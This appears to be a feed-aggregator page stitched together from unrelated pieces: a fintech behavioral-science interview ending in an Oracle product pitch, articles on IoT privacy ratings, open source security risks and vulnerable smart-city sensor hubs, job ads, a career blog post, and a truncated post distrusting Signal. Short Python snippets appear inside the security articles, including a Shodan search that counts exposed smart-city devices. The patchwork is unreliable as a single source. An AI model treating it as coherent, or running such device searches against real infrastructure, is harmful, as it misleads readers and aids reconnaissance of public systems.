Behavioral science is fascinating because the study of human behavior itself is so intriguing. One of the many books I was influenced by early in my career was Paco Underhill’s 1999 book Why We Buy. The science around purchase behavior and how companies leverage our behavior to create buying decisions that fall in their favor—down to where products are placed and the colors that are used to attract the eye—these are techniques that have been used since before the Mad Men era of advertising.

I’m intrigued by the psychology behind the decisions we make. People are a massive puzzle to solve at scale. Humans are known to be irrational, but they are irrational in predictable ways. Leveraging behavioral science, along with things like design thinking and human-computer interaction, has been a part of building products and customer experiences in financial services for some time. Nudging customers to sign up for a service, take an additional product, or perform behaviors that are sometimes painful, like budgeting, saving more, investing, consolidating, or optimizing the use of credit, all involves deeply understanding human behavior.

Student debt reached $1.5 trillion in Q1 2018. Can behavioral analytics be used to help students better manage their personal finances?

What’s driving this intersection between behavioral science and fintech?

Companies have been using the ideas of behavioral science in strategic planning and marketing for some time, but it’s only been in the last decade that the technology to act upon the massive amount of new data we collect has been available. The type of data we used to struggle to plug into a mainframe through data reels now flies freely within a cloud of shared service layers. So beyond new analytic tools and AI, there are a few other things that are important.

People interact with brands differently now. To become a customer now in financial services, it most often means that you’re interacting through an app, or a website, not in any physical form. It’s not necessarily how a branch is laid out anymore; it’s how the navigation works in your application, and what you can do in how few steps, how quickly you can onboard. This is what is really driving the future of revenue opportunity in the financial space.

At the same time, the competition for customers is increasing. Investments in the behavioral science area are a must-have now because the competition gets smarter every day and the applications to understand human behavior are simultaneously getting more accessible. We use behavioral science to understand and refine our precious opportunities to build empathy and relationships. 

You’ve mentioned the evolution of behavioral science in the financial services industry. How is it evolving and what’s the impact?

Behavioral science is nothing without the right type of pertinent, clean data. We have entered the era of engagement banking: a marketing, sales, and service model that deploys technology to achieve customer intimacy at scale. But humans are not just 1’s and 0’s. You need a variety of teams within banks and fintechs to leverage data in the right way, to make sure it addresses real human needs.

The real impact of these new tools has only started to be really felt. We have an opportunity to broaden the global use of financial services to reduce the number of the underbanked, to open new markets for payments and credit, to optimize every unit of currency for our customers more fully and lift up a generation by ending poverty and reducing wealth inequality.

40% of Americans could not come up with $400 for an emergency expense. Behavioral science can help people move out of poverty and reduce wealth inequality.

How does artificial intelligence facilitate this evolution?

Financial institutions are challenged with innovating a century-old service model, and working out how advanced analytics and artificial intelligence tools can be used within the enterprise is still a work in progress. Our metamorphosis has been slowed by the dual weight of digital transformation and the broader implications of ever-evolving customers.

Banks have vast amounts of unstructured and disparate data throughout their complicated, mostly legacy, systems. We used to see static data modeling efforts based on hundreds of inputs. That’s transitioned to an infinitely more complex set of thousands of variables. In response, we are developing and deploying applications that make use of machine learning, deep learning, pattern recognition, and natural language processing among other functionalities.

Using AI applications, we have seen efficiency gains in customer onboarding/know-your-customer (KYC), automation of credit decisioning and fraud detection, personalized and contextual messaging, supply-chain improvements, infinitely tailored product development, and more effective communication strategies based on real-time, multivariate data. AI is critical to improving the entire lifecycle of the customer experience.

What’s the role of behavioral analytics in this trend?

Behavioral analytics combines specific user data: transaction histories, where people shop, how they manage their spending and savings habits, the use of credit, historical trends in balances, how they use digital applications, how often they use different channels like ATMs and branches, along with technology usage data like navigation path, clicks, social media interactions, and responsiveness to marketing. It takes a more holistic and human view of data, connecting individual data points to tell us not only what is happening, but also how and why it is happening.

You’ve built out these customization and personalization capabilities in banks and fintechs. Tell us about the basic steps any enterprise can take to build these capabilities.

As an organization, you need to clearly define your business goals. What are the metrics you want to improve? Is it faster onboarding, lower cost of acquisition, quicker turn toward profitable products, etc.? And how can a more customer-centric, personalized experience assist those goals?

As you develop these, make sure you understand who needs to be in the room. Many banks don’t have a true data science team, or they are a sort of hybrid analytical marketing team that has many masters. That’s a mistake. You need deep understanding of advanced analytics to derive the most efficiencies out of these projects. Then you need a strong collaborative team that includes marketing, digital banking, customer experience, and representation from those teams that interacts with clients. Truly user-centric teams leverage data to create a complete understanding of their users’ challenges. They develop insight into what features their customers use and what they don’t and build knowledge of how customers get the most value out of their products. And then they continually iterate and adjust.

You also need to look at your partnerships, including those with fintechs. Several lessons can be derived from fintech platforms: attention to growth through business-model flexibility, devotion to speed-to-market, and a focus on creating new forms of customer value by leveraging these tools to customize everything from onboarding to the new-user experience, as well as how they communicate and customize the relationship over time.

What would be the optimum technology stack to support real-time contextual messages, products, or services?

Choosing the right technology stack for behavioral analytics is not that different than for any other type of application. You have to find the solution that maps most economically and efficiently to your particular problem set. This means implementing a technology that can solve the core business problems, can be maintained and supported efficiently, and minimizes your total cost of ownership.

In banking, it has to reduce risk while maximizing your opportunities for success. The legacy systems that many banks still deploy were built on relational databases and were not designed for real-time processing, access via RESTful APIs, or the cloud-based data lakes we see today. Nor did they have the ability to connect and analyze any form of data. The types of data we now have to consider are just breathtaking and growing daily. In choosing technology partners, you want to make sure what you’re buying is built for this new world from the beginning and that the platform is flexible. You have to be able to migrate between on-premises solutions and the cloud, along with the variety of virtual machines in use today.

If I can paraphrase what you’re saying, it’s that financial services companies need a big data solution to manage all these streams of structured and unstructured data coming in from AI/ML, and other advanced applications. Additionally, a big data solution that simplifies deployment by offering identical functionality on-premises, in the cloud, and in the Oracle public Cloud behind your firewall would also be a big plus.

Are there any other must-haves in terms of performance, analytics, etc., to build an effective AI-based solution?

Must-haves include flexibility to consume all types of data, especially data gathered from the web and from digital applications. It needs to be very good at data aggregation—that is, reducing large data sets down to more manageable proportions that are still representative. It must be good at transitioning from aggregation to the detail level and back, to optimize different analytical tools. It should be strong in quickly identifying cardinality—how many distinct values there can be within a given field.

Some other things to look for in a supporting infrastructure are direct access through query tools (SQL), support for data transformation within the platform (ETL and ELT tools), a flexible data model or unstructured access to all data, algorithmic data transformation, the ability to add and access one-off data sets simply (like through ODBC), and flexible ways to use APIs to load and extract information, that kind of thing. A good system also needs to work in real time to help customers take the most optimized journey within digital applications.
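
To ground two of those terms, here is a small, hedged illustration, with made-up transaction data, of identifying cardinality and moving between aggregate and detail views. A production stack would do this at warehouse scale rather than in pandas, and the field names are invented.

```python
# A toy illustration of "cardinality" and aggregation on made-up transaction data.
import pandas as pd

tx = pd.DataFrame({
    "customer_id": [1, 1, 2, 3, 3, 3],
    "channel": ["app", "atm", "app", "branch", "app", "app"],
    "amount": [25.0, 60.0, 12.5, 100.0, 9.99, 42.0],
})

# Cardinality: how many distinct values each field can take.
print(tx.nunique())

# Aggregation: reduce detail rows to representative summaries per channel...
print(tx.groupby("channel")["amount"].agg(["count", "mean"]))

# ...then transition back to the detail level for a single segment.
print(tx[tx["channel"] == "app"])
```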

To wrap up our discussion, what three tips would you give the enterprise IT chief about how to incorporate these new AI capabilities to help the organization reach its goals around delivering a better customer experience?

First, realize that this isn’t just a technology problem—it will require engineers, data scientists, system architects, and data specialists, sure, but you also need a collaborative team that involves many parts of the business and builds tools that are accessible.

Start with simple KPIs to improve. Reducing the cost of acquisition or improving onboarding workflows, improving release time for customer-facing applications, reducing particular types of unnecessary customer churn—these are good places to start. They improve efficiencies and impact the bottom line. They help build the case around necessary new technology spend and create momentum.

Understand that the future of the financial services model is all about the customer—understanding their needs and helping the business meet them. Our greatest source of innovation is, in the end, our empathy.

You’ve given us a lot to think about, Bradley. Based on our discussion, it seems that the world of financial services is changing and banks today will require an effective AI-based solution that leverages behavioral science and personalization capabilities.

Additionally, in order for banks to sustain a competitive advantage and lead in the market, they need to invest in an effective big data warehousing strategy. Therefore, business and IT leaders need a solution that can store, acquire, and process large data workloads at scale and has the cognitive workload capabilities to give you the advanced insights needed to run your business most effectively. It is also important that the technology is tailor-made for advancing businesses’ analytical capabilities and leverages familiar big data and analytics open source tools. And Oracle Big Data Appliance provides that high-performance, cloud-ready, secure platform for running diverse workloads using Hadoop, Spark, and NoSQL systems.


          The Cathedral & the Bazaar: Musings on Linux and Open Source by an Accidental Revolutionary, by Eric S. Raymond
Document of The Cathedral & the Bazaar: Musings on Linux and Open Source by an Accidental Revolutionary, by Eric S. Raymond
          The Internet of Things Needs Food Safety-Style Ratings for Privacy and Security

By now, we’re all intimately familiar with the comically bad security and privacy standards that plague most modern, internet-connected devices in the internet of things era.

Thanks to companies and evangelists that prioritize profits over privacy and security, your refrigerator can now leak your Gmail credentials, your kids' Barbie doll can now be used as a surveillance tool, and your Wi-Fi-enabled tea kettle can open your wireless network to attack.

The papier-mâché-grade security on many of these devices also makes it trivial to quickly compromise and integrate them into botnets, resulting in the rise of historically unprecedented DDoS attacks over the last few years. Security is so lacking that many devices can be hacked and integrated into botnets in a matter of just minutes once connected to the internet.

Security researchers like Bruce Schneier have dubbed this a sort of “invisible pollution.” It is pollution, he notes, that nobody wants to address because neither the buyer nor the seller in this chain of dysfunction tends to give much of a damn.

“The owners of those devices don't care,” notes Schneier. “Their devices were cheap to buy, they still work, and they don't even know (the victims of DDoS attacks). The sellers of those devices don't care: they're now selling newer and better models, and the original buyers only cared about price and features.”

In short, the market has failed, creating millions of new potential attack vectors annually as an ocean of such devices is mindlessly connected to the internet.

One potential solution? To incorporate security and privacy grades in all product and service reviews moving forward.

“Until now, reviewers have primarily focused on how smart gadgets work, but not how they fail: it's like reviewing cars but only by testing the accelerator, and not the brakes,” activist and author Cory Doctorow told Motherboard.

“The problem is that it's hard to tell how a device fails,” Doctorow said. “‘The absence of evidence isn't the evidence of absence,’ so just because you don't spot any glaring security problems, it doesn't mean there aren't any.”

Countless hardware vendors field products with absolutely zero transparency into what data is being collected or transmitted. As a result, consumers can often find their smart cameras and DVRs participating in DDoS attacks, or their televisions happily hoovering up an ocean of viewing data, which is then bounced around the internet sans encryption.

Product reviews that highlight these problems at the point of sale could go a long way toward discouraging such cavalier behavior toward consumer welfare and a healthy internet, pressuring companies to at least spend a few fleeting moments pretending to care about privacy and security if they value their brand reputation.

To that end, Consumer Reports announced last year it would begin working with non-profit privacy research firm Ranking Digital Rights (RDR) and nonprofit software security-testing organization Cyber Independent Testing Lab (CITL) on a new open source standard intended to help make internet-connected hardware safer.

“If Consumer Reports and other public-interest organizations create a reasonable standard and let people know which products do the best job of meeting it, consumer pressure and choices can change the marketplace. We’ve seen this repeatedly over our 80-year history,” the group argued.

This week, those efforts began taking shape.

Consumer Reports’ latest ranking of mobile payment platforms marks the first time security and privacy have factored into the organization’s ratings for any product or service. It’s a practice Geoffrey MacDougall, Consumer Reports' head of partnership and strategy, says will soon be expanded to the organization’s reviews of internet-connected products.



Such a practice being standardized in service and hardware reviews could go a long way in addressing things like “smart” televisions that spend as much time watching you as you do watching them, or internet-connected door locks that leave you less secure than the dumb alternatives they were supposed to supplant.

Doctorow calls the Consumer Reports effort both “welcome and long overdue,” but notes it needs to be the first step in a broader reform campaign.

Passing meaningful consumer privacy rules, like the FCC broadband protections killed by Congress last year, will also play a role, as will efforts to improve transparency, like the Princeton computer science department’s IoT Inspector, which provides end users with more insight into what IoT devices are actually up to online.

Thwarting efforts by numerous companies to punish and intimidate security researchers also needs to be addressed, notes Doctorow.

“I think the next logical step is to start explicitly calling out companies that reserve the right to sue security researchers through laws like Section 1201 of the DMCA and the Computer Fraud and Abuse Act,” he said. “We know from long experience that just the possibility of retaliation for criticizing products by pointing out their defects is enough to chill the speech of security researchers.”

For years the internet of things space has been the butt of justified jokes, as we collectively laugh at how we need to approve an overlong TOS just to use our shiny new oven, or the fact we can’t use our thermostat or TV because they were infected by ransomware.

But researchers like Schneier have warned that with millions of new attack vectors being introduced annually thanks to apathetic companies and oblivious consumers, it’s only a matter of time before this systemic dysfunction results in some massive, potentially fatal attacks on essential infrastructure.

With that understood, helping consumers better understand which companies couldn’t care less about privacy and security seems like the very least we can do.


          5 Open Source Security Risks You Should Know About

By giving developers free access to well-built components that serve important functions in the context of wider applications, the open source model speeds up development times for commercial software by making it unnecessary to build entire applications completely from scratch.

However, with research showing that 78 percent of audited codebases contained at least one open source vulnerability, of which 54 percent were high-risk ones that hackers could exploit, there is clear evidence that using open source code comes with security risks. Such risks often don’t arise due to the quality of the open source code (or lack thereof) but due to a combination of factors involving the nature of the open source model and how organizations manage their software.

Read on to find out the five open source security risks you should know about.

Publicity of Exploits

The nature of the open source model is that open source projects make their code available to anybody. This has the advantage that the open source community can flag potential exploits they find in the code and give open source project managers time to fix the issues before publicly revealing information on vulnerabilities.

However, eventually such exploits are made publicly available on the National Vulnerability Database (NVD) for anyone to view. Hackers can use the publicity of these exploits to their advantage by targeting organizations that are slow to patch applications that depend on open source projects with recently disclosed vulnerabilities.

A pertinent example of issues due to publicly available exploits was the major Equifax breach in 2017 wherein the credit reporting agency exposed the personal details of 143 million people. The reason the exposure occurred was that attackers noticed Equifax used a version of the open source Apache Struts framework which had a high-risk vulnerability, and the hackers used that information to their advantage.

Dealing with this risk from the organization's perspective means recognizing that open source exploits are made public and that hackers stand to gain a lot from attempting to breach services that use vulnerable components. Update as quickly as possible or pay the consequences.
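
To make that concrete, here is a minimal sketch of how a team might watch the public feed for CVEs that mention a component they ship. It assumes the NVD REST API 2.0 endpoint and its keywordSearch parameter, so names should be checked against the current NVD documentation before use:

# Sketch: poll the NVD for published CVEs mentioning a dependency.
# Endpoint and parameter names follow NVD's REST API 2.0 and should be
# verified against the current documentation.
import requests

NVD_URL = "https://services.nvd.nist.gov/rest/json/cves/2.0"

def recent_cves(keyword, limit=5):
    resp = requests.get(
        NVD_URL,
        params={"keywordSearch": keyword, "resultsPerPage": limit},
        timeout=30,
    )
    resp.raise_for_status()
    findings = []
    for item in resp.json().get("vulnerabilities", []):
        cve = item["cve"]
        # descriptions is a list of {"lang", "value"}; the first is usually English
        findings.append((cve["id"], cve["descriptions"][0]["value"]))
    return findings

for cve_id, summary in recent_cves("apache struts"):
    print(cve_id, "-", summary[:100])

Run on a schedule, even a toy check like this shortens the window between public disclosure and your first look at it.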

Difficulty Managing Licenses

A single proprietary application is often composed of multiple open source components, each released under one of several license types, such as the Apache License, GPL, or MIT License. This makes managing open source licenses difficult, given the frequency with which enterprises develop and release software and the fact that over 200 open source license types exist.

Organizations are required to comply with all individual terms of different licenses, and non-compliance with the terms of a license puts you at risk of legal action, potentially damaging the financial security of your company.

Tracking licenses manually is prohibitively time-consuming―consider a software composition analysis tool that can automatically track all of the different open source components and licenses you use in your applications.
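
As a taste of what such a tool automates, the sketch below inventories the licenses declared by installed Python packages using importlib.metadata (Python 3.8+). A real software composition analysis tool does this across languages, build systems, and the transitive dependency tree:

# Sketch: list installed Python packages and their declared licenses.
from importlib.metadata import distributions

def license_inventory():
    inventory = {}
    for dist in distributions():
        name = dist.metadata.get("Name", "unknown")
        # the License metadata field may be absent or empty
        inventory[name] = dist.metadata.get("License") or "UNKNOWN"
    return inventory

for name, lic in sorted(license_inventory().items()):
    print(f"{name}: {lic}")

Entries that come back UNKNOWN are exactly the ones worth investigating first.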

Potential Infringement Issues

Open source components may introduce intellectual property infringement risks because these projects lack standard commercial controls, giving proprietary code a way to make its way into open source projects. This risk is evident in the real-world case of SCO Group, which contended that IBM stole part of the UnixWare source code, used it for its Project Monterey, and sought billions of dollars in damages.

Appropriate due diligence into open source projects can flag potential infringement risks.

Operational Risks

One of the main sources of risks when using open source components in the enterprise comes from operational inefficiencies. Of primary concern from an operational standpoint is the failure to track open source components and update those components as new versions become available. These updates often address high-risk security vulnerabilities, and delays can cause a catastrophe, as was the case in the Equifax breach.

It’s vital, therefore, to keep an inventory of your open source usage across all your development teams, not only to ensure visibility and transparency, but to avoid different teams using different versions of the same component. Keeping an inventory needs to become part of a dedicated policy on open source usage, and software composition analysis tools provide a means to enforce this practice in an automated, easily manageable way without manually updating spreadsheets.
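
A toy version of that check for Python dependencies might compare what is installed against the latest release on PyPI's JSON API; the plain string comparison and PyPI-only scope are deliberate simplifications:

# Sketch: flag installed packages that lag behind the latest PyPI release.
import requests
from importlib.metadata import distributions

def outdated_packages():
    stale = []
    for dist in distributions():
        name = dist.metadata.get("Name")
        if not name:
            continue
        resp = requests.get(f"https://pypi.org/pypi/{name}/json", timeout=30)
        if resp.status_code != 200:
            continue  # not on PyPI, e.g. an internal package
        latest = resp.json()["info"]["version"]
        if latest != dist.version:  # naive string comparison, fine for a report
            stale.append((name, dist.version, latest))
    return stale

for name, installed, latest in outdated_packages():
    print(f"{name}: installed {installed}, latest {latest}")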

Another issue is abandoned projects that perhaps begin with much active involvement from the open source community but eventually peter out until nobody updates them anymore. If such projects make their way into apps in the form of libraries or frameworks, your developers are responsible for fixing future vulnerabilities. Part of good inventory management is to track projects that are updated infrequently.

Developer Malpractices

Some security risks arise due to developer malpractices, such as copying and pasting code from open source libraries. Copying and pasting is an issue firstly because you copy any vulnerabilities that may exist in the project’s code when you do it, and secondly because there is no way to track and update a code snippet once it’s added to your codebase, making your applications susceptible to potential future vulnerabilities that arise. You can avoid this issue by creating an open source policy that specifically forbids copying and pasting snippets directly from projects to your application codebases.

Another malpractice that can occur is the manual transfer via email of open source components across teams. This is opposed to the recommended best practice which is to use a binary repository manager or a shared, secure network location for transferring components.

Conclusion

Open source is a highly useful model that deserves its current standing as the bedrock of the development of many modern applications. However, smart use of open source components involves acknowledgment of the security risks involved in using these components in your applications and prudent, proactive action to minimize the chances of these risks affecting your organization directly.


          The Sensors That Power Smart Cities Are a Hacker's Dream

At this point, it seems like every so-called consumer smart device―from routers and baby monitors to connected thermostats and garage door openers―has been shown to have vulnerabilities. But that same security crisis has also played out on a macro scale, exposing municipal works and public safety sensors to manipulation that could destabilize traffic lights, undermine radiation sensors, or even create a calamity like causing a dam to overflow because of tainted water level data.

Researchers from IBM Security and data security firm Threatcare looked at sensor hubs from three companies―Libelium, Echelon, and Battelle―that sell systems to underpin smart city schemes. Smart city spending is estimated to reach about $81 billion globally in 2018, and the three companies all have different areas of influence. Echelon, for example, is one of the top suppliers of smart street lighting deployments in the world.

Fundamentally, though, the systems the researchers analyzed are similar. By setting up an array of sensors and integrating their data, a municipality can get more nuanced insight into how to solve interconnected problems. These sensors monitor things like weather, air quality, traffic, radiation, and water levels, and can be used to automatically inform fundamental services like traffic and street lights, security systems, and emergency alerts.

'When they fail, it could cause damage to life and livelihood.'

Daniel Crowley, IBM X-Force Red

That last one might sound familiar; an accidental missile alert in January sent Hawaii's residents scrambling, while a hack set off Dallas's tornado sirens last year. In fact, those incidents and others like it inspired Daniel Crowley of IBM X-Force Red and Jennifer Savage of Threatcare to investigate these systems in the first place. What they found dismayed them. In just their initial survey, the researchers found a total of 17 new vulnerabilities in products from the three companies, including eight critical flaws.

“The reason we wanted to focus on hubs was that if you control the central authority that runs the whole show then you can manipulate a lot of information that’s being passed around,” Crowley says. “It appears to be a huge area of vulnerability, and the stakes are high when we’re talking about putting computers in everything and giving them important jobs like public safety and management of industrial control systems. When they fail, it could cause damage to life and livelihood and when we’re not putting the proper security and privacy measures in place bad things can happen, especially with motivated and resourced attackers.”

The researchers found basic vulnerabilities, like guessable default passwords that would make it easy for an attacker to access a device, along with bugs that could allow an attacker to inject malicious software commands, and others that would allow an attacker to sidestep authentication checks.

Many smart city schemes also use the open internet, rather than an internal city network, to connect sensors or relay data to the cloud, potentially leaving devices exposed publicly for anyone to find. Simple checks on IoT crawlers like Shodan and Censys yielded thousands of vulnerable smart city products deployed in the wild. The researchers contacted officials from a major US city that they found using vulnerable devices to monitor traffic, and a European country with at-risk radiation detectors.
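
For illustration, that kind of check can be reproduced with Shodan's official Python client (an API key is required; the query string below is invented, and a real survey would target specific product banners):

# Sketch: count publicly reachable devices matching a product keyword.
import shodan

api = shodan.Shodan("YOUR_API_KEY")  # placeholder key
results = api.search('"smart city" port:80')  # illustrative query only
print("exposed devices:", results["total"])
for match in results["matches"][:5]:
    print(match["ip_str"], match.get("org", "unknown org"))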

"I live in a city that’s starting to implement smart city devices," Threatcare's Savage says. "We bought a house here and we can choose not to have IoT devices in our home, we can go out of our way to buy a dumb TV not a smart TV. But I can’t control if there are street lights with cameras baked into them right outside my house and I have no control over the vehicle hub that my city might be using. It gets to me as a security researcher that a city might be making these types of decisions for me."

The three companies have made patches available for all 17 bugs. Echelon, whose smart city offerings include not just lighting but also building automation and transportation, says it collaborated with IBM to resolve its issues. "Echelon confirmed the vulnerability, developed mitigation solutions, notified customers, and informed DHS ICS-CERT," spokesperson Thomas Cook told WIRED, referring to the Department of Homeland Security's Computer Emergency Readiness Team, which tracks vulnerabilities.

Battelle spokesperson Katy Delaney noted that the group is a technology development nonprofit, and that the vulnerability IBM researchers found was in an open source smart city hub collaboration with the Federal Highway Administration that hasn't yet been deployed. "We appreciate IBM bringing their considerable resources to bear in finding these potential security issues," Delaney told WIRED. "We wanted feedback and we appreciate the scrutiny, improvement, and help." Libelium, a Spanish company with extensive smart city offerings, could not be reached for comment.

'It gets to me as a security researcher that a city might be making these types of decisions for me.'

Jennifer Savage, Threatcare

While having patches available for all the flaws is a crucial step, the researchers note the importance of raising awareness about these problems to make sure that municipalities are prioritizing patching, which organizations so often don’t. The smart city hubs the researchers looked at don’t have automatic update capabilities, a common setup on industrial control devices since a buggy update could destabilize vital infrastructure. But the downside is that every entity using these products will need to proactively apply the patches, or devices in the wild will continue to be vulnerable.

And while the researchers emphasize that they don't have evidence of any of the bugs they found being abused, they did discover that someone posted an exploit for one of the flaws on a hacker forum in August 2015. "There are people out there who aren’t white hat hackers who have had at least one of these exploits for ages and who knows what they’ve done with it," Savage says. "This is something that people have been looking into."

Industrial control hacking has recently become a major focus of nation state attackers, for instance, with Russia taking the most prolific known interest. State-sponsored Russian hackers have probed US grid and election infrastructure and have wreaked havoc overseas, causing two blackouts in Ukraine and compromising payment systems in the country with malware campaigns. As the risk grows worldwide, US officials have increasingly acknowledged the vulnerability of US infrastructure, and agencies like the Department of Homeland Security are scrambling to implement systemic safeguards.

Cities will continue to invest in smart technology. Hopefully as they do, they'll appreciate that more data will often mean more risks―and that those vulnerabilities aren't always easy to fix.

          Front End Web Developer
OR-Beaverton, Acara Solutions is looking for a Front End Web Developer for our client located in Beaverton, OR. Create responsive layouts and mobile-specific web applications; develop web solutions using jQuery, HTML5, CSS, SASS; research and deploy new web-based technologies including open source; maintain and modify legacy code in existing web apps; work with other team members to address UI or workflow issues to creat...
          Software Developer - Varian Medical Systems - Winnipeg, MB
Java, JavaScript/TypeScript, Angular, Python. Specialization in Java or other open source Web Application stack....
From Varian Medical Systems - Fri, 03 Aug 2018 06:07:59 GMT - View all Winnipeg, MB jobs
          Compensation Consultant - Elastic - Seattle, WA
At Elastic, we have a simple goal: to take on the world's data problems with products that delight and inspire. As the company behind the popular open source...
From Elastic - Mon, 23 Jul 2018 18:41:03 GMT - View all Seattle, WA jobs
          Open Source Software Market to 2025 - Intel, Epson, IBM, Transcend, Oracle, Acquia, Actuate, Alfresco Software Inc, Astaro Corp
(EMAILWIRE.COM, August 09, 2018) Research N Reports has published new industry research that focuses on the Open Source Software market and delivers in-depth market analysis and future prospects of the global Open Source Software market. The study covers significant data which makes the research document...
          How to Install InvoicePlane on Ubuntu 18.04 LTS

InvoicePlane is a free, open source and self-hosted application for managing your invoices, clients, and payments.


          awscli (1.15.75)
The AWS CLI is an open source tool built on top of the AWS SDK for Python (Boto) that provides commands for interacting with AWS services.

          How Do You Start In The Tech Sector?

How Do You Start In The Tech Sector?
Career

August 9th, 2018

The tech sector, if you know what you're doing, is easier than most fields to get started in. However, you do have to know what you're doing. In this post, I'm going to step through a series of ways to get started, in case you're not sure.

Sounds easy, right? Well, nothing worthwhile's easy. Now, to be fair, I don't mean "if you know what you're doing" in any patronising or condescending way.

What I mean is that, unlike say being a GP, dentist, civil engineer, corporate lawyer, Queen's Counsel (QC), etc., you don't need to have years of formal training.

What’s more, you don’t need to be registered with an industry group/board before you're allowed to work. These can include the Institute of Chartered Accountants, the Queensland Law Society, or the Queensland Bar Association.

In IT, however, most people whom I've spoken to over the years care far more for what you can do, rather than what a piece of paper says you could do.

Let's Say You Want to Write Code

If you want to write code, then start by learning the basics of a software development language. I'm not going to get into a flame war about one language or another, whether one's better than another or not.

That's for people with too much time on their hands, and for people who are too emotionally invested in their language(s) of choice ― or dare I say, just a bit insecure.

There are a host of languages to choose from, readily available on the three major operating systems (Linux, macOS, and Windows). Some of the most common, where you'll find the greatest amount of help and documentation, are PHP, Perl, C/C++, Java, Go, Ruby, Python, Haskell, and Lisp. Grab yourself an editor, or an IDE, learn it inside out, and get started learning to write code.

I've linked to a host of excellent online resources for each at the end of the article.

For my part, I prefer any language borne out of C/C++. I've written code in Visual Basic and Cobol and didn't come away from either experience positively.

Once you've learned the basics, start contributing to an open source project! You don't need to be overly ambitious, so the project doesn't need to be a big one.

It could be a small library, such as VIM for Technical Writers, which I maintain every so often. It could, however, be the Linux Kernel too, if that's your motivation and you are feeling particularly ambitious.

Regardless of what you choose, by contributing to these projects you'll learn far faster and better than you likely could in any other way. Why?

Because you're working on real projects and have the opportunity to be mentored by people who have years of hands-on experience. You'll get practical, guided experience, the kind you'd likely take years to acquire on your own.

They'll help teach you good habits, best practices, patterns, techniques, and so much more; things you'd likely take ages to hear about, let alone learn.

What's more, you'll become part of a living, breathing community where ― hopefully ― you're encouraged to grow and appreciate the responsibilities and requirements of what it takes to ship software.

But I'd Rather Be a Systems Administrator?

The same approach can be broadly applied. Here’s my suggestion. Install a copy of Linux, BSD, or Microsoft Windows on an old PC or laptop. As you're installing it, have a look around at the tools that are available for it.

hint: open source provides a staggering amount of choice. #justsayin.

Get to know how it's administered, whether via GUI tools (and PowerShell) on Windows, or via the various daemons and their configuration files and command-line tools on Linux and BSD.

Server administration's a pretty broad topic, so it's hard ― if not downright impossible ― to suggest a specific set of tools to learn. I'm encouraging you at this point to get a broad understanding.

Later, if you're keen, you can specialise in a particular area. However, for now, get a broad understanding of:

- Networking
- User and Group Management
- Installation Options and Tooling
- Service/Daemon Configuration
- Disk Management

Whether you're on Linux, BSD, or Windows, I've linked to a host of resources at the bottom of the article to help get you started.

Now that you've learned the fundamentals, do something where people can critique you and hold you accountable, such as hosting a website of your own, through a provider such as Digital Ocean or Linode.

The web server you use, whether Apache, NGINX, Lighttpd, or IIS, doesn't matter. Just use one that works well on your OS of choice.

Once you've got it up and running, start building on the day to day tasks required to keep it up and running nicely. Once you've grown some confidence, move on to learning how to improve the site's security and performance, and deployment process.

This can include:

- Optimising the web server, filesystem, and operating system configuration settings for maximum throughput
- Setting up an intrusion detection system (IDS)
- Dockerising your site

To Go Open Source or Microsoft?

By now you've got a pretty good set of knowledge. However, stop for just a moment, because it's time to figure out if you're going to specialise in open source (Linux/UNIX/BSD) or whether you're going to focus around Microsoft's tools and technologies.

You can become knowledgeable in both, and most developers and systems administrators that I know do have a broad range of knowledge in both. However, I'd suggest that it's easier to build your knowledge in one rather than attempting to learn both.

Depending on the operating system you've been using up until now, it's likely that you've already made your choice. However, it's good to stop and deliberately think about it.

What Do You Do Next?

Now, let's get back to building your skills. What do you do next? If you want to be a sys admin, start looking around for opportunities to help others with their hosting needs.

Don't go all in ― yet. There's no need to rush. Keep stepping up gradually, building your confidence and skills.

If you're not sure of who might need help, have a think about:

- What clubs are you involved in?
- Do you have friends with small businesses that might need support?
- Do you know others who want to learn what you have and need a mentor?

I'm sure that as you start thinking, you'll be able to uncover other ideas and possibilities. Now you have to get out of your comfort zone, contact people and ask them if they need help.

Worst case scenario, they say no. Whatever! Keep going until you find someone who does want help and is willing to take you on.

Regardless of the path that you take, you should feel pretty confident in your foundational skills, because they're based on practical experience.

So, it's time to push further. To do that, I'd suggest contacting a University, a bank, or an insurance provider, if you want to cut your teeth on big installations.

Sure, many other places have big server installations. However, these three are the first that come to mind.

If you are focused on software development, here are a few suggestions:

- Contact software development companies (avoid "digital agencies") and see if they’re hiring.
- Talk to your local chamber of commerce and industry and let them know you’re around and what you do.
- Find the local business networking groups and go to the networking breakfasts.
- Get involved in your local user groups (this goes for sys admins too, btw).
- Start a user group if there isn’t one for what you want to focus on.

In Conclusion

I could go on and on. The key takeaway I'm trying to leave you with is that, if you have practical experience, you'll increase the likelihood of gaining employment.

Any employer I've had of any worth values hands-on experience over a piece of paper any day.

Don't get me wrong; there's nothing wrong with degrees or industry certifications. And for complete transparency:

- I have a Bachelor of Information Technology
- I'm LPIC-1 certified
- I’m a Zend (PHP 5) Engineer

However, university qualifications and industry certifications should only reinforce what you already know, and not be something that is used to get your start.

With all that said, I want to encourage you to go down the Open Source path, not Microsoft. But I’m biased, as I’ve been using Linux since 1999.

Regardless, have a chew on all that, and let me know what you think in the comments. I hope that, if you’re keen to get into IT, that this helps you do so, and clears up one or more questions and doubts that you may have.

Further Reading

Open Source
          I don’t trust Signal

Occasionally when Signal is in the press and getting a lot of favorable discussion, I feel the need to step into various forums, IRC channels, and so on, and explain why I don’t trust Signal. Let’s do a blog post instead.

Off the bat, let me explain that I expect a tool which claims to be secure to actually be secure. I don’t view “but that makes it harder for the average person” as an acceptable excuse. If Edward Snowden and Bruce Schneier are going to spout the virtues of the app, I expect it to actually be secure when it matters - when vulnerable people using it to encrypt sensitive communications are targeted by smart and powerful adversaries.

Making promises about security without explaining the tradeoffs you made in order to appeal to the average user is unethical. Tradeoffs are necessary - but self-serving tradeoffs are not, and it’s your responsibility to clearly explain the drawbacks and advantages of the tradeoffs you make. If you make broad and inaccurate statements about your communications product being “secure”, then when the political prisoners who believed you are being tortured and hanged, it’s on you. The stakes are serious. Let me explain why I don’t think Signal takes them seriously.

Google Play

Why do I make a big deal out of Google Play and Google Play Services? Well, some people might trust Google, the company. But up against nation states, it’s no contest - Google has ties to the NSA, has been served secret subpoenas, and is literally the world’s largest machine designed for harvesting and analyzing private information about their users. Here’s what Google Play Services actually is: a rootkit. Google Play Services lets Google do silent background updates on apps on your phone and give them any permission they want. Having Google Play Services on your phone means your phone is not secure.

